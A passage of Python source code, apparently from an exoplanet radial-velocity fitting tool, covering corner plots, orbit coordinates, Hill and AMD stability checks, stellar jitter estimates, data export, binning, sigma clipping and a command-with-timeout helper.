pad=cornerplot_opt["pad"],
labelpad=cornerplot_opt["labelpad"],
truth_color=cornerplot_opt["truth_color"],
title_kwargs={"fontsize": 12},
scale_hist=cornerplot_opt["scale_hist"],
no_fill_contours=cornerplot_opt["no_fill_contours"],
fill_contours=cornerplot_opt["fill_contours"],
plot_datapoints=cornerplot_opt["plot_datapoints"],
kwargs=kwargs)
corner.corner(samples_,
range = range_stab,
bins=cornerplot_opt["bins"],
color=cornerplot_opt["color"],
reverse=cornerplot_opt["reverse"],
upper=cornerplot_opt["upper"],
labels=samp_labels,
quantiles=[level/100.0, 1.0-level/100.0],
levels=(0.6827, 0.9545,0.9973),
smooth=cornerplot_opt["smooth"],
smooth1d=cornerplot_opt["smooth1d"],
plot_contours=cornerplot_opt["plot_contours"],
show_titles=cornerplot_opt["show_titles"],
truths=best_fit_par,
dpi=cornerplot_opt["dpi"],
pad=cornerplot_opt["pad"],
labelpad=cornerplot_opt["labelpad"],
truth_color=cornerplot_opt["truth_color"],
title_kwargs={"fontsize": 12},
scale_hist=cornerplot_opt["scale_hist"],
no_fill_contours=cornerplot_opt["no_fill_contours"],
fill_contours=cornerplot_opt["fill_contours"],
plot_datapoints=cornerplot_opt["plot_datapoints"],
# data_kwargs={'zorder':-1,'color':cornerplot_opt["color"]},
contour_kwargs={'color':cornerplot_opt["color"]},
hist_kwargs={'color':cornerplot_opt["color"]},
kwargs={'zorder':-1,'color':cornerplot_opt["color"]},
fig =fig)
else:
fig = corner.corner(samples_,
#range = range_stab,
bins=cornerplot_opt["bins"],
color=cornerplot_opt["color"],
reverse=cornerplot_opt["reverse"],
upper=cornerplot_opt["upper"],
labels=samp_labels,
quantiles=[level/100.0, 1.0-level/100.0],
levels=(0.6827, 0.9545,0.9973),
smooth=cornerplot_opt["smooth"],
smooth1d=cornerplot_opt["smooth1d"],
plot_contours=cornerplot_opt["plot_contours"],
show_titles=cornerplot_opt["show_titles"],
truths=best_fit_par,
dpi=cornerplot_opt["dpi"],
pad=cornerplot_opt["pad"],
labelpad=cornerplot_opt["labelpad"],
truth_color=cornerplot_opt["truth_color"],
title_kwargs={"fontsize": 12},
scale_hist=cornerplot_opt["scale_hist"],
no_fill_contours=cornerplot_opt["no_fill_contours"],
fill_contours=cornerplot_opt["fill_contours"],
plot_datapoints=cornerplot_opt["plot_datapoints"],
kwargs=kwargs)
if type_plot == 'mcmc':
fig.savefig(obj.mcmc_corner_plot_file)
if type_plot == 'nest':
fig.savefig(obj.nest_corner_plot_file)
### to avoid memory leak in loops!
fig.clf()
del fig
del samples_
del samp
del samples
del ln
print("Cornerplot done!")
return
def planet_orbit_xyz(obj, planet):
u1 = obj.params.stellar_mass * (4*np.pi*np.pi)/(365.25*365.25)
mean_orb = np.linspace(0,2.0*np.pi, 360)
x = np.zeros(len(mean_orb))
y = np.zeros(len(mean_orb))
z = np.zeros(len(mean_orb))
u = np.zeros(len(mean_orb))
v = np.zeros(len(mean_orb))
w = np.zeros(len(mean_orb))
dist = np.zeros(len(mean_orb))
q = (1.0 - obj.params.planet_params[2 + int(planet)*7])*float(obj.fit_results.a[int(planet)])
#this need to be fixed to work with arrays
for f in range(len(mean_orb)):
x[f],y[f],z[f],u[f],v[f],w[f] = jac2astrocen.mco_el2x(u1,q,
obj.params.planet_params[2 + int(planet)*7],
np.radians(obj.params.planet_params[5 + int(planet)*7]-90.0),
np.radians(obj.params.planet_params[3 + int(planet)*7]) - np.radians(obj.params.planet_params[6 + int(planet)*7]),
np.radians(obj.params.planet_params[6 + int(planet)*7] ), mean_orb[f])
dist[f] = np.sqrt(x[f]**2.0 + y[f]**2.0 + z[f]**2.0)
x_p,y_p,z_p,u_p,v_p,w_p = jac2astrocen.mco_el2x(u1,q,
obj.params.planet_params[2 + int(planet)*7],
np.radians(obj.params.planet_params[5 + int(planet)*7] -90.0),
np.radians(obj.params.planet_params[3 + int(planet)*7]) - np.radians(obj.params.planet_params[6 + int(planet)*7]),
np.radians(obj.params.planet_params[6 + int(planet)*7]), np.radians(obj.params.planet_params[4 + int(planet)*7]))
min_index = np.unravel_index(np.argmin(dist, axis=None), dist.shape)
max_index = np.unravel_index(np.argmax(dist, axis=None), dist.shape)
return np.array([x,y,z,u,v,w]), np.array([x_p,y_p,z_p,u_p,v_p,w_p]), np.array([x[min_index],y[min_index],z[min_index],u[min_index],v[min_index],w[min_index]]), np.array([x[max_index],y[max_index],z[max_index],u[max_index],v[max_index],w[max_index]])
def get_xyz(obj):
st_mass = obj.params.stellar_mass * (4*np.pi*np.pi)/(365.25*365.25)
frho3 = 1.0
u1 = st_mass
obj.xyz_mass[0] = u1
Msun = 1.989e33
Au = 1.49597892e13
##### this is a hack avoiding transit init crash!!!! TB fixed/removed
if obj.fit_results.mass == 0 or len(np.atleast_1d(obj.fit_results.mass)) == 0 or np.sum(obj.fit_results.a) == 0:
return obj
#####################################################################
for i in range(obj.npl):
pl_mass_in_st = float(obj.fit_results.mass[i])/ 1047.70266835
pl_mass = pl_mass_in_st * (4*np.pi*np.pi)/(365.25*365.25)
q = (1.0 - obj.params.planet_params[2 + i*7])*float(obj.fit_results.a[i])
obj.rpl[i+1] = frho3*(1.5*pl_mass_in_st*Msun/(2*np.pi))**0.3333333333/Au
# rpl(i) = frho3*(1.5d0*mpl0*MSUN/TWOPI)**0.3333333333d0/AU
obj.rhill[i+1] = float(obj.fit_results.a[i])*(pl_mass/(3.0*st_mass))**0.3333333333
u1 = u1 +pl_mass
obj.xyz_mass[i+1] = pl_mass
x_p,y_p,z_p,u_p,v_p,w_p = jac2astrocen.mco_el2x(u1,q,
obj.params.planet_params[2 + i*7],
np.radians(obj.params.planet_params[5 + i*7]),
np.radians(obj.params.planet_params[3 + i*7]) - np.radians(obj.params.planet_params[6 + i*7]),
np.radians(obj.params.planet_params[6 + i*7]), np.radians(obj.params.planet_params[4 + i*7]))
obj.xzy[i+1] = np.array([x_p,y_p,z_p])
obj.uvw[i+1] = np.array([u_p,v_p,w_p])
return obj
def get_Hill_satb(obj):
st_mass = float(obj.params.stellar_mass)* 1047.70266835
if obj.fit_results.mass == 0 or len(np.atleast_1d(obj.fit_results.mass)) <=1:
return False
#####################################################################
else:
Delta_a = (float(obj.fit_results.a[1]) - float(obj.fit_results.a[0]))/float(obj.fit_results.a[0])
Mu = 2.4*( (float(obj.fit_results.mass[0])/ st_mass) + (float(obj.fit_results.mass[1])/ st_mass) )**(1.0/3.0)
if Mu >= Delta_a:
return False
else:
return True
def get_AMD_stab(obj):
st_mass = float(obj.params.stellar_mass)* 1047.70266835
AMD_stable = True
if obj.fit_results.mass == 0 or len(np.atleast_1d(obj.fit_results.mass)) <=1:
return False
else:
pl_ecc = np.array([float(obj.params.planet_params[2 + i*7]) for i in range(obj.npl)])
pl_a = np.array([float(obj.fit_results.a[i]) for i in range(obj.npl)])
pl_mass = np.array([float(obj.fit_results.mass[i]) for i in range(obj.npl)])
inds = pl_a.argsort()
sorted_pl_ecc = pl_ecc[inds]
sorted_pl_a = pl_a[inds]
sorted_pl_mass = pl_mass[inds]
for i in range(obj.npl - 1):
alpha = sorted_pl_a[i]/sorted_pl_a[i+1]
gamma = sorted_pl_mass[i]/sorted_pl_mass[i+1]
epsilon = (sorted_pl_mass[i]+sorted_pl_mass[i+1])/st_mass
AMD = gamma*np.sqrt(alpha)*(1.-np.sqrt(1.-sorted_pl_ecc[i]**2)) + 1.-np.sqrt(1.-sorted_pl_ecc[i+1]**2)
AMD_Hill = gamma*np.sqrt(alpha) + 1. - (1.+gamma)**1.5 * np.sqrt(alpha/(gamma+alpha) * (1.+(3.**(4./3.)*epsilon**(2./3.)*gamma)/((1.+gamma)**2)))
#print( AMD,AMD_Hill)
if AMD >= AMD_Hill:
return False
return AMD_stable
def loglik_AMD_penalty(pl_a,pl_ecc,pl_mass,st_mass):
for i in range(len(pl_a) - 1):
alpha = pl_a[i]/pl_a[i+1]
gamma = pl_mass[i]/pl_mass[i+1]
epsilon = (pl_mass[i]+pl_mass[i+1])/st_mass
AMD = gamma*np.sqrt(alpha)*(1.-np.sqrt(1.- pl_ecc[i]**2)) + 1.-np.sqrt(1.- pl_ecc[i+1]**2)
AMD_Hill = gamma*np.sqrt(alpha) + 1. - (1.+gamma)**1.5 * np.sqrt(alpha/(gamma+alpha) * (1.+(3.**(4./3.)*epsilon**(2./3.)*gamma)/((1.+gamma)**2)))
if AMD >= AMD_Hill:
return -np.inf
return 0
def randomString(stringLength=5):
"""
Generate a random string of fixed length
"""
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def copy_file_to_datafiles(path):
'''
creates a temp_ velocity file in the root directory of the GUI.
input: full path to the file
output: temp_name of the file to be loaded
'''
dirname, basename = os.path.split(path)
#temp_dir = './datafiles'#tempfile.gettempdir()
tmp = '/tmp/es2'
if platform.system() == 'Darwin':
if not os.path.exists(tmp):
os.system("mkdir %s"%tmp)
else:
if os.access(tmp, os.W_OK):
tmp = '/tmp/es2'
else:
tmp = '/tmp/%s'%(randomString(3))
tmp = '%s/%s'%(tmp,randomString(5))
os.system("mkdir %s"%tmp)
else:
tmp = tempfile.mkdtemp()
temp_path = os.path.join(tmp, basename)
# os.system("cp %s %s"%(path, temp_path))
f_in = open(path, "r")
lines = f_in.readlines()
f = open(temp_path, 'wb') # open the file
for j in range(len(lines)):
if lines[j].isspace() or lines[j].split()[0].startswith("#"):
continue
line = lines[j].split()
text = b"%s %s %s \n"%(bytes(str(lines[j].split()[0]).encode()),bytes(str(lines[j].split()[1]).encode()),bytes(str(lines[j].split()[2]).encode()) )
f.write(text)
f.close()
f_in.close()
return temp_path
def mut_incl(i1,i2,capOm):
'''
Calculates the mutual inclination of two planets
input parameters:
i1,i2, Delta Omega: inclinations and diffence of the line of nodes in deg.
output parameters:
Delta i: mutual orbital inclination in deg.
'''
fb = np.degrees(np.arccos(((np.cos(np.radians(i1))*np.cos(np.radians(i2)))+
(np.sin(np.radians(i1))*np.sin(np.radians(i2))*np.cos(np.radians(capOm))))))
return fb
def add_jitter(obj, errors, ind):
errors_with_jitt = np.array([np.sqrt(errors[i]**2 + obj.params.jitters[ii]**2) for i,ii in enumerate(ind)])
return errors_with_jitt
def get_stellar_rotation(obj, print_output=False):
'''
'''
vsini = float(obj.stellar_vsini)
vsini_d = float(obj.stellar_vsini_err)
R = float(obj.stellar_radius)
R_d = float(obj.stellar_radius_err)
Rot = (2*np.pi*R*695700.0)/ (vsini * 86400.0)
Delta_Rot = np.sqrt( ( ( (2*np.pi*R*695700.0)**2 * (vsini_d*86400.0)**2) + ((2*np.pi*R_d*695700.0)**2 * (vsini*86400.0)**2) ) /
(vsini*86400.0)**4
)
if print_output == True:
print("Stellar Rot. period = %s +/- %s [days]"%(Rot, Delta_Rot))
return [Rot, Delta_Rot]
def get_rv_scatter(obj, print_output=False,use_kb2011=False):
'''
'''
Solar_fact = 0.234
Solar_fact_d = 0.014
M = float(obj.stellar_mass)
M_d = float(obj.stellar_mass_err)
L = float(obj.stellar_luminosity)
L_d = float(obj.stellar_luminosity_err)
Teff = float(obj.stellar_Teff)/5771.0
Teff_d = float(obj.stellar_Teff_err)/5771.0
if use_kb2011==True:
A = (L / ((M**1.5)*(Teff**4.25))) * Solar_fact
delta_A = 0.25*np.sqrt(
(L**2.0 * (
4.0*Teff**2.0 *(
(4.0 * (M**2.0) * (Solar_fact_d**2.0)) +
(9.0 * M_d**2.0 * Solar_fact**2.0)) +
(289.0 * (Teff_d**2.0) * (M**2.0) * (Solar_fact**2.0) )) +
(16.0 * (L_d**2.0) * (Teff**2.0) * (M**2.0) * (Solar_fact**2.0)) ) / ((Teff**(21.0/2.0)) * (M**5.0)) )
if print_output == True:
print("KB2011 jitter = %s +/- %s [m/s]"%(A, delta_A))
else:
A = (L/M) * Solar_fact
delta_A = np.sqrt( (L**2.0 * ((M**2.0)*(Solar_fact_d**2.0) + (M_d**2.0)*(Solar_fact**2.0) ) +
((L_d**2.0) *(M**2.0) * (Solar_fact**2.0) ) )/ M**4.0 )
if print_output == True:
print("KB1995 jitter = %s +/- %s [m/s]"%(A, delta_A))
return [A, delta_A]
def export_RV_data(obj, idset_ts, file="RV_data.txt", jitter=False, o_c=False,
print_data=False, remove_offset = False, width = 10, precision = 3):
if len(obj.filelist.idset)==0:
return
output_file = str(file)
f = open(output_file, 'w')
idset_ts = np.array(np.atleast_1d(idset_ts)) #-1
JD = obj.fit_results.rv_model.jd
if not o_c:
rv = obj.fit_results.rv_model.rvs
else:
rv = obj.fit_results.rv_model.o_c
id_set = obj.filelist.idset
if jitter==True:
sigma = add_jitter(obj,obj.fit_results.rv_model.rv_err, id_set)
else:
sigma = obj.fit_results.rv_model.rv_err
for i in range(len(idset_ts)):
for ii in range(len(JD)):
if int(id_set[ii]) != int(idset_ts[i]):
continue
else:
if not remove_offset:
rv[ii] = rv[ii] - float(obj.params.offsets[i])
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} {2:{width}.{precision}f} {3:{width}.{precision}f} \n'.format(float(JD[ii]), float(rv[ii]), float(sigma[ii]), idset_ts[i], width = width, precision = precision ) )
if print_data:
print('{0:{width}.{precision}f} {1:{width}.{precision}f} {2:{width}.{precision}f} {3:{width}.{precision}f}'.format(float(JD[ii]), float(rv[ii]), float(sigma[ii]), idset_ts[i], width = width, precision = precision ) )
f.close()
print('Done!')
return
def export_RV_model(obj, file="RV_model.txt", width = 10, precision = 4):
if len(obj.fit_results.rv_model.jd)==0:
return
#if not os.path.exists(path):
# os.makedirs(path)
output_file = str(file)
f = open(output_file, 'w')
JD = obj.fit_results.model_jd
if obj.doGP == True:
y_model = obj.fit_results.model + obj.gp_model_curve[0]
else:
y_model = obj.fit_results.model
for i in range(len(JD)):
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} \n'.format(float(JD[i]), float(y_model[i]), width = width, precision = precision) )
f.close()
print('Done!')
return
def export_orbital_evol(obj, file="orb_evol.txt", planet = 1, width = 10, precision = 6):
k = int(planet-1)
if len(obj.evol_T[k])==0 or k < 0:
print("No N-body integrations done?")
return
output_file = str(file)
f = open(output_file, 'w')
#obj.evol_T_energy
#obj.evol_energy
#obj.evol_momentum['lx']
#obj.evol_momentum['ly']
#obj.evol_momentum['lz']
T = obj.evol_T[k]
a = obj.evol_a[k]
e = obj.evol_e[k]
om = obj.evol_p[k]
M = obj.evol_M[k]
inc = obj.evol_i[k]
Om =obj.evol_Om[k]
for i in range(len(T)):
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} {2:{width}.{precision}f} {3:{width}.{precision}f} {4:{width}.{precision}f} {5:{width}.{precision}f} {6:{width}.{precision}f} \n'.format(float(T[i]), float(a[i]), float(e[i]), float(om[i]),float(M[i]),float(inc[i]),float(Om[i]), width = width, precision = precision) )
f.close()
print('Done!')
return
def check_temp_RV_file(obj):
for i in range(obj.filelist.ndset):
if os.path.exists(obj.filelist.files[i].path) and os.access(obj.filelist.files[i].path, os.W_OK):
# print(obj.filelist.files[i].path)
continue
else:
dirname, basename = os.path.split(obj.filelist.files[i].path)
if platform.system() == 'Darwin':
dirname = '/tmp/es_%s'%(randomString(3))
else:
dirname = '/tmp/%s'%(randomString(3))
dirname = '%s/%s'%(dirname,randomString(5))
#else:
# dirname = os.path.abspath(dirname)+'_'+randomString(3)+'/'+randomString(3)
obj.filelist.files[i].path = os.path.join(dirname, basename)
os.makedirs(dirname)
f = open(obj.filelist.files[i].path, 'wb') # open the file
for j in range(len(obj.rv_data_sets[i][0])):
if str(obj.rv_data_sets[i][0][j]).startswith("#"):
continue
text = b"%s %s %s \n"%(bytes(str(obj.rv_data_sets[i][0][j]).encode()),bytes(str(obj.rv_data_sets[i][1][j]).encode()),bytes(str(obj.rv_data_sets[i][2][j]).encode()) )
f.write(text)
f.close()
def modify_temp_RV_file_old(obj, file_n = 0, add_error = 0, data_to_keep = None):
if obj.filelist.ndset < file_n +1:
print("No RV file # %s"%(file_n+1))
return
elif not os.path.exists(obj.filelist.files[file_n].path):
return
else:
if add_error < 0:
sign = -1
else:
sign = 1
new_error = []
for j in range(len(obj.rv_data_sets[file_n][0])):
k = obj.rv_data_sets[file_n][2][j]**2 + add_error**2 *sign
if k < 0:
print("You seem to subtract %s from the error budget. As a result, the RV uncertainty of one or more elements would be negative. Errors cannot be negative. Please subtract another value"%add_error)
return
new_error.append(k)
f = open(obj.filelist.files[file_n].path, 'wb') # open the file
for j in range(len(obj.rv_data_sets[file_n][0])):
if str(obj.rv_data_sets[file_n][0][j]).startswith("#") or data_to_keep != None and j not in data_to_keep:
continue
text = b"%s %s %s \n"%(bytes(str(obj.rv_data_sets[file_n][0][j]).encode()),bytes(str(obj.rv_data_sets[file_n][1][j]).encode()),bytes(str(np.sqrt(new_error[j])).encode()) )
f.write(text)
f.close()
obj.filelist.read_rvfiles(obj.params.offsets)
return obj
def common_member(a, b):
a_set = set(a)
b_set = set(b)
if (a_set & b_set):
return True
else:
return False
def bin_data(JD,rv,sigma,idset, bin_size = 1.0):
binning_list = []
v_l = [1100000,1212234324]
for i in range(len(JD)):
b_l = [x for x,z in enumerate(JD) if abs(z - JD[i]) < bin_size]
if common_member(b_l, v_l):
continue
else:
binning_list.append(b_l)
v_l = b_l
mj_all = []
mr_all = []
ms_all = []
mi_all = []
for x in range(len(binning_list)):
mj_all.append(np.mean(JD[binning_list[x]]))
mr_all.append(np.average(rv[binning_list[x]], weights=1./sigma[binning_list[x]]))
#ms_all.append(np.average(ms/np.sqrt(len(ms)), weights=1./ms) )
ms_all.append(np.average(sigma[binning_list[x]]) )
#ms_all.append( np.sqrt( (np.average(ms/np.sqrt(len(ms)), weights=1./ms)**2.0) + (abs(max(mr)-min(mr))**2.0) ) )
#ms_all.append( np.sqrt( (np.average(ms/np.sqrt(len(ms)), weights=1./ms)**2.0) + np.std(mr)**2.0) ) )
#print np.median(mr), np.std(mr)
mi_all.append(np.mean(idset[binning_list[x]]))
JD2, indices = np.unique(np.asarray(mj_all), return_index=True)
ind = np.array(indices)
mr_all = np.array(mr_all)
mj_all = np.array(mj_all)
ms_all = np.array(ms_all)
mi_all = np.array(mi_all)
mr_all = mr_all[ind]
mj_all = mj_all[ind]
ms_all = ms_all[ind]
mi_all = mi_all[ind]
print(len(JD2))
return mj_all, mr_all, ms_all, mi_all
def bin_rv_data(obj, file_n = 0, bin_size = 1.0, bin_tf = False):
if bin_tf == False:
obj.rv_data_sets[file_n] = dill.copy(obj.rv_data_sets_init[file_n])
return
else:
JD = np.array(obj.rv_data_sets[file_n][0])
rv = np.array(obj.rv_data_sets[file_n][1])
sigma = np.array(obj.rv_data_sets[file_n][2])
idset = np.array(obj.rv_data_sets[file_n][3])
mj_all,mr_all,ms_all,mi_all = bin_data(JD,rv,sigma,idset, bin_size = bin_size)
obj.rv_data_sets[file_n] = np.array([mj_all,mr_all,ms_all,mi_all])
#obj.rv_data_sets[file_n][0] = dill.copy(mj_all)
#obj.rv_data_sets[file_n][1] = dill.copy(mr_all)
#obj.rv_data_sets[file_n][2] = dill.copy(ms_all)
#obj.rv_data_sets[file_n][3] = dill.copy(mi_all)
return obj
def bin_rv_dataOld(obj, file_n = 0, bin_size = 1.0, bin_tf = False):
if bin_tf == False:
obj.rv_data_sets[file_n] = dill.copy(obj.rv_data_sets_init[file_n])
return
else:
JD = np.array(obj.rv_data_sets[file_n][0])
rv = np.array(obj.rv_data_sets[file_n][1])
sigma = np.array(obj.rv_data_sets[file_n][2])
idset = np.array(obj.rv_data_sets[file_n][3])
mask = np.zeros(len(JD))
mj_all = []
mr_all = []
ms_all = []
mi_all = []
for x in range(len(JD)):
JD_int = JD.astype(int)
mask = (JD_int != JD_int[x]).astype(int)
mj = np.ma.masked_array(JD, mask=mask).compressed()
mr = np.ma.masked_array(rv, mask=mask).compressed()
ms = np.ma.masked_array(sigma, mask=mask).compressed()
mi = np.ma.masked_array(idset, mask=mask).compressed()
mj_all.append(np.mean(mj))
mr_all.append(np.average(mr, weights=1./ms))
#ms_all.append(np.average(ms/np.sqrt(len(ms)), weights=1./ms) )
ms_all.append(np.average(ms) )
mi_all.append(np.mean(mi))
#ms_all.append( np.sqrt( (np.average(ms/np.sqrt(len(ms)), weights=1./ms)**2.0) + (abs(max(mr)-min(mr))**2.0) ) )
#ms_all.append( np.sqrt( (np.average(ms/np.sqrt(len(ms)), weights=1./ms)**2.0) + np.std(mr)**2.0) ) )
#print np.median(mr), np.std(mr)
JD, indices = np.unique(np.asarray(mj_all), return_index=True)
ind = np.array(indices)
mr_all = np.array(mr_all)
mj_all = np.array(mj_all)
ms_all = np.array(ms_all)
mi_all = np.array(mi_all)
mr_all = mr_all[ind]
mj_all = mj_all[ind]
ms_all = ms_all[ind]
mi_all = mi_all[ind]
obj.rv_data_sets[file_n] = np.array([mj_all,mr_all,ms_all,mi_all])
#obj.rv_data_sets[file_n][0] = dill.copy(mj_all)
#obj.rv_data_sets[file_n][1] = dill.copy(mr_all)
#obj.rv_data_sets[file_n][2] = dill.copy(ms_all)
#obj.rv_data_sets[file_n][3] = dill.copy(mi_all)
return obj
def modify_temp_RV_file(obj, file_n = 0, add_error = 0, data_to_keep = None):
if obj.filelist.ndset < file_n +1:
print("No RV file # %s"%(file_n+1))
return
elif not os.path.exists(obj.filelist.files[file_n].path):
return
else:
if add_error < 0:
sign = -1
else:
sign = 1
new_error = []
for j in range(len(obj.rv_data_sets[file_n][0])):
k = obj.rv_data_sets[file_n][2][j]**2 + add_error**2 *sign
if k < 0:
print("You seem to subtract %s from the error budget. As a result, the RV uncertainty of one or more elements would be negative. Errors cannot be negative. Please subtract another value"%add_error)
return
new_error.append(k)
f = open(obj.filelist.files[file_n].path, 'wb') # open the file
org_data_file = obj.rv_data_sets[file_n]
for j in range(len(org_data_file[0])):
if str(org_data_file[0][j]).startswith("#") or data_to_keep != None and j not in data_to_keep:
continue
text = b"%s %s %s \n"%(bytes(str(org_data_file[0][j]).encode()),bytes(str(org_data_file[1][j]).encode()),bytes(str(np.sqrt(new_error[j])).encode()) )
f.write(text)
f.close()
obj.filelist.read_rvfiles(obj.params.offsets)
return obj
### some experimets! ###
def sigma_clip(obj, type = 'RV', sigma_clip = 10, file_n = 0, add_error = 0, remove_mean = False, verbose = True):
if type == 'RV':
if sigma_clip == None:
modify_temp_RV_file(obj, file_n = file_n, add_error = add_error, data_to_keep = None)
return
else:
obj2 = dill.copy(obj)
modify_temp_RV_file(obj2, file_n = file_n, add_error = add_error, data_to_keep = None)
#obj2.epoch = obj.epoch
obj2.fitting(outputfiles=[1,1,1], minimize_fortran=True, minimize_loglik=True,amoeba_starts=0)
JD_data = obj2.fit_results.rv_model.jd[obj2.filelist.idset==file_n]
o_c_data = obj2.fit_results.rv_model.o_c[obj2.filelist.idset==file_n]
data_ind = obj2.filelist.idset
c, low, upp = pdf.sigmaclip(o_c_data, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(o_c_data) if z in c]
removed_idx = [x for x, z in enumerate(o_c_data) if z not in c]
modify_temp_RV_file(obj, file_n = file_n, add_error = add_error, data_to_keep = remaining_idx)
del obj2
if verbose:
print("\n %s clipped epochs:"%type)
for z in JD_data[removed_idx]:
print(z)
return obj
if type == 'act':
if len(obj.act_data_sets[file_n]) == 0:
print("No act. file # %s"%(file_n))
return
org_epoch = obj.act_data_sets_init[file_n][0]
org_data = obj.act_data_sets_init[file_n][1]
org_data_sig = obj.act_data_sets_init[file_n][2]
org_data_mean = org_data - np.mean(org_data)
if sigma_clip != None:
c, low, upp = pdf.sigmaclip(org_data_mean, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(org_data_mean) if z in c]
removed_idx = [x for x, z in enumerate(org_data_mean) if z not in c]
obj.act_data_sets[file_n][1] = np.take(obj.act_data_sets_init[file_n][1], remaining_idx)
obj.act_data_sets[file_n][0] = np.take(obj.act_data_sets_init[file_n][0], remaining_idx)
obj.act_data_sets[file_n][2] = np.take(obj.act_data_sets_init[file_n][2], remaining_idx)
new_org_data = obj.act_data_sets[file_n][1]
new_org_data_mean = new_org_data - np.mean(new_org_data)
if verbose:
print("\n %s clipped epochs:"%type)
for z in org_epoch[removed_idx]:
print(z)
if remove_mean == True:
obj.act_data_sets[file_n][1] = new_org_data_mean
else:
if remove_mean == True:
obj.act_data_sets[file_n][0] = org_epoch
obj.act_data_sets[file_n][1] = org_data_mean
obj.act_data_sets[file_n][2] = org_data_sig
else:
obj.act_data_sets[file_n][0] = org_epoch
obj.act_data_sets[file_n][1] = org_data
obj.act_data_sets[file_n][2] = org_data_sig
return obj
if type == 'tra':
if len(obj.tra_data_sets[file_n]) == 0:
print("No transit file # %s"%(file_n))
return
org_epoch = obj.tra_data_sets_init[file_n][0]
org_data = obj.tra_data_sets_init[file_n][1]
org_data_sig = obj.tra_data_sets_init[file_n][2]
org_data_air = obj.tra_data_sets_init[file_n][3]
org_data_o_c = obj.tra_data_sets_init[file_n][4]
org_data_mean = org_data_o_c - np.mean(org_data_o_c)
if sigma_clip != None:
c, low, upp = pdf.sigmaclip(org_data_mean, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(org_data_mean) if z in c]
removed_idx = [x for x, z in enumerate(org_data_mean) if z not in c]
obj.tra_data_sets[file_n][3] = np.take(obj.tra_data_sets_init[file_n][3], remaining_idx)
obj.tra_data_sets[file_n][0] = np.take(obj.tra_data_sets_init[file_n][0], remaining_idx)
obj.tra_data_sets[file_n][2] = np.take(obj.tra_data_sets_init[file_n][2], remaining_idx)
obj.tra_data_sets[file_n][1] = np.take(obj.tra_data_sets_init[file_n][1], remaining_idx)
obj.tra_data_sets[file_n][4] = np.take(obj.tra_data_sets_init[file_n][4], remaining_idx)
new_org_data = obj.tra_data_sets[file_n][1]
new_org_data_mean = new_org_data - np.mean(new_org_data)
if verbose:
print("\n %s clipped epochs:"%type)
for z in org_epoch[removed_idx]:
print(z)
#if remove_mean == True:
# obj.tra_data_sets[file_n][1] = new_org_data_mean
else:
# if remove_mean == True:
# obj.tra_data_sets[file_n][0] = org_epoch
# obj.tra_data_sets[file_n][1] = org_data_mean
# obj.tra_data_sets[file_n][2] = org_data_sig
#
# else:
obj.tra_data_sets[file_n][0] = org_epoch
obj.tra_data_sets[file_n][1] = org_data
obj.tra_data_sets[file_n][2] = org_data_sig
obj.tra_data_sets[file_n][3] = org_data_air
obj.tra_data_sets[file_n][4] = org_data_o_c
return obj
### some experimets! ###
def sigma_clip_act(JD_,act_,sigma_,idset_, sigma_clip = 10, verbose = True):
act = act_ - np.mean(act_)
c, low, upp = pdf.sigmaclip(act, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(act) if z in c]
removed_idx = [x for x, z in enumerate(act) if z not in c]
act = np.take(act_, remaining_idx)
JD = np.take(JD_, remaining_idx)
sigma = np.take(sigma_, remaining_idx)
idset = np.take(idset_, remaining_idx)
if verbose:
print("\n activity clipped epochs:")
for z in JD_[removed_idx]:
print(z)
return JD,act,sigma,idset
def transit_data_norm(obj, file_n = 0, norm = False, verbose = True):
if len(obj.tra_data_sets[file_n]) == 0:
print("No transit file # %s"%(file_n))
return
if norm == True:
obj.tra_data_sets[file_n][0] = obj.tra_data_sets_init[file_n][0]
obj.tra_data_sets[file_n][1] = obj.tra_data_sets_init[file_n][1]/np.mean(obj.tra_data_sets_init[file_n][1])
obj.tra_data_sets[file_n][2] = obj.tra_data_sets_init[file_n][2]/np.mean(obj.tra_data_sets_init[file_n][1])
else:
obj.tra_data_sets[file_n][0] = dill.copy(obj.tra_data_sets_init[file_n][0])
obj.tra_data_sets[file_n][1] = dill.copy(obj.tra_data_sets_init[file_n][1])
obj.tra_data_sets[file_n][2] = dill.copy(obj.tra_data_sets_init[file_n][2])
return obj
### some experimets! ###
def gen_RV_curve(obj,x=None):
obj2 = dill.copy(obj)
if len(x) > 3:
f = open('datafiles/RV_curve', 'wb') # open the file
for j in range(len(x)):
#print(fit_new.rv_data_sets[i][0][j])
text = b"%s %s %s \n"%(bytes(str(x[j]).encode()),bytes(str(0.0).encode()),bytes(str(1.0).encode()) )
f.write(text)
f.close()
obj2.add_dataset("RV_curve", "datafiles/RV_curve",0.0,0.0) # the last two entries are initial offset and jitter
os.system("rm datafiles/RV_curve")
obj2.fitting(outputfiles=[0,1,0], minimize_fortran=True, minimize_loglik=True, amoeba_starts=0, print_stat=False)
jd = obj2.fit_results.rv_model.jd
# rvs = obj2.fit_results.rv_model.rvs
o_c = obj2.fit_results.rv_model.o_c*(-1)
return np.array([jd,o_c])
#############################
def file_from_path(path):
head, tail = ntpath.split(path)
return tail or ntpath.basename(head)
def run_command_with_timeout(args, secs, output=False, pipe=False): # set output=True if you need to save the output
'''
Run a command and kill if it takes too long.
'''
# print(args)
if not (pipe):
text=tempfile.TemporaryFile() # because PIPE usually has too low capacity
proc = Popen(args, shell=True, preexec_fn=os.setsid, stdout=text, stderr=text)
else:
proc = Popen(args, shell=True, preexec_fn=os.setsid, stdout=PIPE, stderr=PIPE)
# print(proc)
proc_thread = Thread(target=proc.wait)
proc_thread.start()
proc_thread.join(secs)
if proc_thread.is_alive():
#print (proc.pid)
try:
os.killpg(proc.pid, signal.SIGTERM)
except OSError:
pass
#print(args)
print('Process #{} killed after {} seconds'.format(proc.pid, secs))
flag = -1
return '',flag
if not (pipe):
text.seek(0)
string_to_output=text.readlines()
else:
text=proc.communicate()[0]
string_to_output=text.splitlines()
# text.close()
for i in range(len(string_to_output)):
string_to_output[i]=string_to_output[i].decode('utf-8').split()
if not (pipe):
text.close()
flag = 1
if (output):
return string_to_output,flag # besides the flag which informs about successful termination we also return all the console output in case we want to save it in a variable
else:
return '',flag
